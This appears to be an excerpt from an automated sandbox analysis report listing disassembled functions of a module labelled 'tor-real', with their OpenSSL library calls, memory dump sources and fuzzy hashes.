                                                                            • Instruction ID: 18e56fb3a0b2135b40ea10c0e5a490488ac07535e5b99bd432911fffc5197e86
                                                                            • Opcode Fuzzy Hash: 3b06e9dfdb4a104a03f807d24a346137d9bf364dc583aa16a8203e95351aedfd
                                                                            • Instruction Fuzzy Hash: D5F0EFB1208701DFD3109F90D44039EBBF0BF85358F61CE0CE1A85BBA0C779A4498B8A
                                                                            Function 6C0BCE30 Relevance: 7.6, APIs: 5, Instructions: 150COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CRYPTO_THREAD_write_lock.LIBCRYPTO-1_1(?,?,?,?,?,?,?,?,00000000,?,6C0AF971), ref: 6C0BCF07
                                                                            • OPENSSL_LH_retrieve.LIBCRYPTO-1_1(?,?,?,?,?,?,?,?,00000000,?,6C0AF971), ref: 6C0BCF16
                                                                            • OPENSSL_LH_delete.LIBCRYPTO-1_1(?,?,?,?,?,?,?,?,00000000,?,6C0AF971), ref: 6C0BCF2D
                                                                            • CRYPTO_THREAD_unlock.LIBCRYPTO-1_1 ref: 6C0BCFB2
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: D_unlockD_write_lockH_deleteH_retrieve
                                                                            • String ID:
                                                                            • API String ID: 3040165603-0
                                                                            • Opcode ID: aeaf61bdeb0863e1a2dd617cecc589489e825ee287a6e75f26b7af0d98dbc77a
                                                                            • Instruction ID: c5ec435c858a5f20d3e223d336a2fff8b99975b733df0f3755f888b7d506647b
                                                                            • Opcode Fuzzy Hash: aeaf61bdeb0863e1a2dd617cecc589489e825ee287a6e75f26b7af0d98dbc77a
                                                                            • Instruction Fuzzy Hash: D161FBB0609306CFD744DF28C58079AB7E4BF84748F24456DE9A8EBB41D736D845CBA2
                                                                            Function 6C0BC690 Relevance: 7.6, APIs: 5, Instructions: 95COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CRYPTO_THREAD_write_lock.LIBCRYPTO-1_1 ref: 6C0BC6C9
                                                                            • OPENSSL_LH_retrieve.LIBCRYPTO-1_1 ref: 6C0BC6D8
                                                                            • OPENSSL_LH_delete.LIBCRYPTO-1_1 ref: 6C0BC6EF
                                                                            • CRYPTO_THREAD_unlock.LIBCRYPTO-1_1 ref: 6C0BC753
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: D_unlockD_write_lockH_deleteH_retrieve
                                                                            • String ID:
                                                                            • API String ID: 3040165603-0
                                                                            • Opcode ID: d4a0aac77926e7240df709ae7dd0565d0fad3cfec4c9d7534d1ee7c2655e2ced
                                                                            • Instruction ID: 9047d4f643d976a9d301fa2826e07914cb24f64778a822511bb60040cd5fe8c7
                                                                            • Opcode Fuzzy Hash: d4a0aac77926e7240df709ae7dd0565d0fad3cfec4c9d7534d1ee7c2655e2ced
                                                                            • Instruction Fuzzy Hash: 93316B706867018FE750EF38C584B9AB7E4BF49348F544A6DE498EBB40D732E4848B91
                                                                            Function 6C0E4C70 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 292COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_free
                                                                            • String ID: A
                                                                            • API String ID: 2581946324-3554254475
                                                                            • Opcode ID: cf41c7995b34b2b8c04d6d91f883dc88dcc574758b73ce74b40c355bdca1b872
                                                                            • Instruction ID: 86c5d5910f06c42b890823a78a97094b8ff5c0462ca71b28e2da796e9c6a2870
                                                                            • Opcode Fuzzy Hash: cf41c7995b34b2b8c04d6d91f883dc88dcc574758b73ce74b40c355bdca1b872
                                                                            • Instruction Fuzzy Hash: C6C1AD75A49311EFCB21CFA4C08075AB7F1BF88708F95896DE9699BB11D730E841CB92
                                                                            Function 6C0B6A2B Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 105COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CRYPTO_malloc.LIBCRYPTO-1_1 ref: 6C0B6AB7
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_malloc
                                                                            • String ID: A
                                                                            • API String ID: 1457121658-3554254475
                                                                            • Opcode ID: a3b9807f3f53e8cdaaba397957766e4d3118b41344aaea23c4ec642c3845288b
                                                                            • Instruction ID: 643c352ec6781c5804f35f92a2da2b1296bf4b2409cf7cef2b23f47e3e8fb017
                                                                            • Opcode Fuzzy Hash: a3b9807f3f53e8cdaaba397957766e4d3118b41344aaea23c4ec642c3845288b
                                                                            • Instruction Fuzzy Hash: E2416E726053068FD714DF54C880B9EB7F0EF85358F25492CE998AB750D732E985CB81
                                                                            Function 6C09A6B0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 95COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C09A75E
                                                                            • CRYPTO_malloc.LIBCRYPTO-1_1 ref: 6C09A77C
                                                                              • Part of subcall function 6C0CA0C0: ERR_put_error.LIBCRYPTO-1_1 ref: 6C0CA0F4
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_freeO_mallocR_put_error
                                                                            • String ID: A$w
                                                                            • API String ID: 2160744234-2979019740
                                                                            • Opcode ID: 17c311835129f3b0a00e690328feb6616ae516ab183010087f52d7e38844e70f
                                                                            • Instruction ID: fdaeb557ca8a1659e7e5b0ae54b919a0be4c66728f654518bd49094e589e9afc
                                                                            • Opcode Fuzzy Hash: 17c311835129f3b0a00e690328feb6616ae516ab183010087f52d7e38844e70f
                                                                            • Instruction Fuzzy Hash: 8B3180B25087008FD700DF28D88475ABBF0FF85758F158A6DE9988B751D376E844CB52
                                                                            Function 6C092808 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 69timeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: Time$System$FileO_ctrl
                                                                            • String ID: -
                                                                            • API String ID: 3793654131-2547889144
                                                                            • Opcode ID: df56664c2c132dc4582d7ae9012a1bb4c470d8d9e61cca045fff458acfe1dd4c
                                                                            • Instruction ID: 09a57a87fdab7148ccff52913e14638474be426c780e1c419a124fd9ecac28f8
                                                                            • Opcode Fuzzy Hash: df56664c2c132dc4582d7ae9012a1bb4c470d8d9e61cca045fff458acfe1dd4c
                                                                            • Instruction Fuzzy Hash: A23128B29083059FC740EF29D58439ABBE1FFC4304F45C87DE8988B715DB3495499B92
                                                                            Function 6C0D0460 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 62COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CRYPTO_clear_free.LIBCRYPTO-1_1 ref: 6C0D050D
                                                                              • Part of subcall function 6C0A3510: CRYPTO_malloc.LIBCRYPTO-1_1 ref: 6C0A356C
                                                                              • Part of subcall function 6C0A3510: memcpy.MSVCRT ref: 6C0A359D
                                                                              • Part of subcall function 6C0A3510: memcpy.MSVCRT ref: 6C0A35C9
                                                                              • Part of subcall function 6C0A3510: CRYPTO_clear_free.LIBCRYPTO-1_1 ref: 6C0A35EE
                                                                              • Part of subcall function 6C0A3510: CRYPTO_clear_free.LIBCRYPTO-1_1 ref: 6C0A3660
                                                                              • Part of subcall function 6C0A3510: CRYPTO_clear_free.LIBCRYPTO-1_1 ref: 6C0A3698
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_clear_free$memcpy$O_malloc
                                                                            • String ID: :$P$j
                                                                            • API String ID: 2939898830-206217590
                                                                            • Opcode ID: db871e4815a6c1e1f9d2afe578f26ebbf7b399bc47b984b91aea4501e6c8f067
                                                                            • Instruction ID: 780ca10a82ddab581b188e299ebf0a2e4f59138e315378ace0599e7c1b0d48b8
                                                                            • Opcode Fuzzy Hash: db871e4815a6c1e1f9d2afe578f26ebbf7b399bc47b984b91aea4501e6c8f067
                                                                            • Instruction Fuzzy Hash: 5D21AFB15087008FD3009F65D884B5BBBE0FF8872DF02896DE8988B712D379E4448B92
                                                                            Function 6C0DE0C7 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 51COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_memdup$O_freememcmp
                                                                            • String ID: D$P
                                                                            • API String ID: 590648765-307317852
                                                                            • Opcode ID: 938af111bdf1c679cbba7ed515cedf21eeb836c65113bfe5bc401c47e8265f20
                                                                            • Instruction ID: ff977bc519b040841dc315531751e4d80f9f4666cb52dc2a01b0073bddeb856b
                                                                            • Opcode Fuzzy Hash: 938af111bdf1c679cbba7ed515cedf21eeb836c65113bfe5bc401c47e8265f20
                                                                            • Instruction Fuzzy Hash: 0E2104B0609300CFD714DF25C48475ABBE0BF88718F058A6DE9A89B352C734A604CFD2
                                                                            Function 6C0D2C04 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C0D2C56
                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C0D2C71
                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C0D2C89
                                                                              • Part of subcall function 6C0959B0: CRYPTO_free.LIBCRYPTO-1_1 ref: 6C0959CA
                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C0D2DB5
                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C0D2DD0
                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C0D2DE8
                                                                            • memcpy.MSVCRT ref: 6C0D3013
                                                                            • EVP_CIPHER_CTX_free.LIBCRYPTO-1_1 ref: 6C0D3026
                                                                            • EVP_MD_CTX_free.LIBCRYPTO-1_1 ref: 6C0D3031
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_free$X_free$memcpy
                                                                            • String ID: i
                                                                            • API String ID: 1711549817-3865851505
                                                                            • Opcode ID: 7d36923c18e0c759855c8800534cb72cb3f1be6fe43e958fe4c0133b80aa9fb2
                                                                            • Instruction ID: dd98e311143a3167f088b49342da1b4ffefcd45d52ec9c30b5d2b51da57d659c
                                                                            • Opcode Fuzzy Hash: 7d36923c18e0c759855c8800534cb72cb3f1be6fe43e958fe4c0133b80aa9fb2
                                                                            • Instruction Fuzzy Hash: 16112AB46087008FD3209F65D08476EBBF0BF49709F818E1DE8999BB10DB35F8458B56
                                                                            Function 6C094E20 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 36COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CRYPTO_zalloc.LIBCRYPTO-1_1 ref: 6C094E65
                                                                            • ERR_put_error.LIBCRYPTO-1_1 ref: 6C094EB7
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_zallocR_put_error
                                                                            • String ID: A$b
                                                                            • API String ID: 2718799170-3696090935
                                                                            • Opcode ID: 1d19164bb7814a0789e546d7b43a49af6e5f04a8632ccbfde37d9283ff3ff7a5
                                                                            • Instruction ID: fb552e7acf1da0912f6d41201af128b120544bf529e6d4a7baee7716e4119ade
                                                                            • Opcode Fuzzy Hash: 1d19164bb7814a0789e546d7b43a49af6e5f04a8632ccbfde37d9283ff3ff7a5
                                                                            • Instruction Fuzzy Hash: F5016DB010A301DFEB04CF55D98430B7BE1AB80718F14C95CE8A88F785D7BAC4949BA2
                                                                            Function 6C0D2D89 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 33COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C0D2DB5
                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C0D2DD0
                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C0D2DE8
                                                                              • Part of subcall function 6C0959B0: CRYPTO_free.LIBCRYPTO-1_1 ref: 6C0959CA
                                                                            • EVP_CIPHER_CTX_free.LIBCRYPTO-1_1 ref: 6C0D3055
                                                                            • EVP_MD_CTX_free.LIBCRYPTO-1_1 ref: 6C0D3060
                                                                            • __stack_chk_fail.LIBSSP-0 ref: 6C0D31E3
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_free$X_free$__stack_chk_fail
                                                                            • String ID: i
                                                                            • API String ID: 2301565740-3865851505
                                                                            • Opcode ID: 7d01a3755899a2b9e98be8b61496d7b5e2aa127336156cb84b192377bacb20d3
                                                                            • Instruction ID: ed9d7e4f9ca0772ffbf903549fb3021b9d8b72cf7ec6ace261e40b9ad823e881
                                                                            • Opcode Fuzzy Hash: 7d01a3755899a2b9e98be8b61496d7b5e2aa127336156cb84b192377bacb20d3
                                                                            • Instruction Fuzzy Hash: EA0116B56487008FD3209F60E08076EBBF1BF89708F55CA0DD4892BB20C735E4458B46
                                                                            Function 6C0D2747 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C0D2775
                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C0D2790
                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C0D27A8
                                                                            • EVP_CIPHER_CTX_free.LIBCRYPTO-1_1 ref: 6C0D27D6
                                                                            • EVP_MD_CTX_free.LIBCRYPTO-1_1 ref: 6C0D27E1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_free$X_free
                                                                            • String ID: i
                                                                            • API String ID: 306345296-3865851505
                                                                            • Opcode ID: dc3c9ce576cb171431d7c6a1068309742610c301f2e7413524dee4972f6976c1
                                                                            • Instruction ID: 1fb19d83be39b658e88d2ecb4ac0b844f40d9ef4f8b3368a43ca1e426b8a9c0c
                                                                            • Opcode Fuzzy Hash: dc3c9ce576cb171431d7c6a1068309742610c301f2e7413524dee4972f6976c1
                                                                            • Instruction Fuzzy Hash: C80164716083008FC3209F64E080BAEBBF1BF85328F45CA0DE498ABA60C731E854CB06
                                                                            Function 6C0D455B Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 30COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C0D4581
                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C0D459C
                                                                            • CRYPTO_free.LIBCRYPTO-1_1 ref: 6C0D45B4
